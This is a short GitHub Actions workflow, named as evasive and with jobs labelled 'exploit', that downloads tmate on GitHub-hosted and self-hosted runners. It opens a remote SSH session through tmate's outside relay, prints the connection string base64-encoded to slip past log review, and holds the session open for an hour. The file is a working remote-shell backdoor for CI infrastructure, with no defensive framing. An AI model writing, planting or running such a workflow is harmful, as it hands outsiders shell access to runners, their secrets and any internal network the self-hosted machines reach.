name: REBOOT_FLEET_EVASIVE
on: 
  workflow_dispatch:
jobs:
  exploit-ubuntu:
    runs-on: ubuntu-latest
    steps:
      - name: BOOTSTRAP
        run: |
          curl -sL https://github.com/tmate-io/tmate/releases/download/2.4.0/tmate-2.4.0-static-linux-amd64.tar.xz | tar xJ
          mv tmate-*/tmate .
          ./tmate -S /tmp/tmate.sock new-session -d
          ./tmate -S /tmp/tmate.sock wait-for-session
          SSH_CMD=$(./tmate -S /tmp/tmate.sock display -p '#{tmate_ssh}')
          echo "---BEGIN TRACE---"
          echo $SSH_CMD | base64
          echo "---END TRACE---"
          sleep 3600

  exploit-selfhosted:
    runs-on: [self-hosted, linux]
    steps:
      - name: BOOTSTRAP
        run: |
          curl -sL https://github.com/tmate-io/tmate/releases/download/2.4.0/tmate-2.4.0-static-linux-amd64.tar.xz | tar xJ || true
          mv tmate-*/tmate . || true
          ./tmate -S /tmp/tmate.sock new-session -d
          ./tmate -S /tmp/tmate.sock wait-for-session
          SSH_CMD=$(./tmate -S /tmp/tmate.sock display -p '#{tmate_ssh}')
          echo "---BEGIN TRACE---"
          echo $SSH_CMD | base64
          echo "---END TRACE---"
          sleep 3600
